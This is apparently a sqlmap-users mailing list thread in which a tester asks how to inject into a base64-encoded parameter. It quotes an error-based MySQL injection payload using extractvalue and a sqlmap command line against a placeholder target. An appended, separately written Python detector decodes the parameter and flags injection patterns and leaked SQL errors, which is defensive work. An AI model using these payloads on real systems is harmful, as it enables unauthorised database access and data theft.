Re: [sqlmap-users] Where in the kb/conf.parameters does sqlmap store parsed variables?
From: Konrads S. <ko...@sm...> - 2014-11-02 16:42:37
Miroslav, I previously exploited this manually. The injection occurs in the mysql INSERT statement. If the statement is invalid, we get an error message in html comments like so:

<!--You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''lalalaa))) or'')' at line 1-->

Which then is exploitable using some well documented methods such as appending string like this:

' or extractvalue(1,concat(0x7e,(SELECT user()))) or'

which gives us a nice error:

<!--XPATH syntax error: '~root@localhost'-->

Anyhow, I got halfway there with the following string:

sqlmap -u 'https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337' --tamper=base64encode --dbms=mysql -v 3 --proxy=http://localhost:8080

sqlmap sends correctly encoded test vectors, but it doesn't send the correct initial URL stability check vector:

1st request URL: https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337
2nd request URL: https://target/script.php?data=REFUQTpVc2VyPVRlc3QsQ0M9NDUxMjYzNDcyMjM0ODg0MixDVlY9MTMzNy4uIlsnJ1suKSg%3D

Also none of the test vectors seem to trigger an error response. I tried with --risk=3 with no avail.

version: 1.0-dev-1ef2c40

--
Konrads Smelkovs
Applied IT sorcery.

On 30 October 2014 13:12, Miroslav Stampar <mir...@gm...> wrote:
> Hi.
>
> In your case I would do this:
>
> 1) Decode original base64 value and give it to the sqlmap in decoded form
> (e.g. id=123 instead of original id=313233)
> 2) Use --tamper=base64encode
>
> Kind regards,
> Miroslav Stampar
>
> On Thu, Oct 30, 2014 at 1:15 PM, Konrads Smelkovs <ko...@sm...> wrote:
>
>> Hello,
>>
>> I am writing a small modification which would allow to tamper/decode
>> variables in the request?
>> As I understand that the parameters are decoded/parsed into a dict
>> after option.py:2323 (parseTargetDirect()), but where can I access the
>> full, parsed dict of the get/post/cookie values?
>>
>> (specifically I have a base64 encoded string as a parameter and to
>> insert the payload, the parameter must be base64-decoded, injected and
>> then encoded back)
>>
>> --
>> Konrads Smelkovs
>> Applied IT sorcery.
>>
>> ------------------------------------------------------------------------------
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
> --
> Miroslav Stampar
> http://about.me/stamparm
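Added example, not from this thread or from sqlmap itself: the defensive counterpart of what the thread shows. A request-log check that base64-decodes the `data` parameter before pattern matching (a raw-string match would miss the tamper-encoded second request), plus a response check for the database error text leaking inside an HTML comment. The function and indicator names are mine; the two sample URLs and the error comment are the ones quoted above.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Indicators worth flagging once a parameter has been decoded. "heuristic-probe" catches the
# quote/bracket clusters of a syntax probe; "error-based-xpath" the extractvalue() error trick.
INDICATORS = {
    "quoted-boolean": re.compile(r"""['"][)\s]*(?:or|and)\b""", re.I),
    "error-based-xpath": re.compile(r"\bextractvalue\s*\(", re.I),
    "heuristic-probe": re.compile(r"""["'\[\]()]{3,}"""),
}
# Database error text leaking inside an HTML comment of the response body.
ERROR_LEAK = re.compile(
    r"<!--.*?(You have an error in your SQL syntax|XPATH syntax error).*?-->", re.S)


def decode_param(value):
    """Return (text, was_base64). `value` is already URL-decoded (parse_qs does that)."""
    padded = value + "=" * (-len(value) % 4)            # tolerate stripped '=' padding
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8"), True
    except (binascii.Error, UnicodeDecodeError):       # not base64: keep the raw value
        return value, False


def inspect_request(url, param="data"):
    """Decode `param` from a request URL; match indicators on both raw and decoded forms."""
    results = []
    for raw in parse_qs(urlsplit(url).query).get(param, []):
        text, was_b64 = decode_param(raw)
        hits = [n for n, rx in INDICATORS.items() if rx.search(text) or rx.search(raw)]
        results.append({"base64": was_b64, "decoded": text, "hits": hits})
    return results


def detect_error_leak(html):
    """Return the leaked error marker found in an HTML comment, or None."""
    m = ERROR_LEAK.search(html)
    return m.group(1) if m else None


# Constructed samples: the two request URLs and the error comment quoted in this thread.
SAMPLE_URLS = [
    "https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337",
    "https://target/script.php?data=REFUQTpVc2VyPVRlc3QsQ0M9NDUxMjYzNDcyMjM0ODg0MixDVlY9MTMzNy4uIlsnJ1suKSg%3D",
]
SAMPLE_HTML = ("<html><body>ok</body></html><!--You have an error in your SQL syntax; "
               "check the manual that corresponds to your MySQL server version for the "
               "right syntax to use near ''lalalaa))) or'')' at line 1-->")

if __name__ == "__main__":
    for u in SAMPLE_URLS:
        print(inspect_request(u))
    print(detect_error_leak(SAMPLE_HTML))
```

Decoding the second URL shows the original value with sqlmap's probe characters appended, which is why it is flagged while the first, plain request is not.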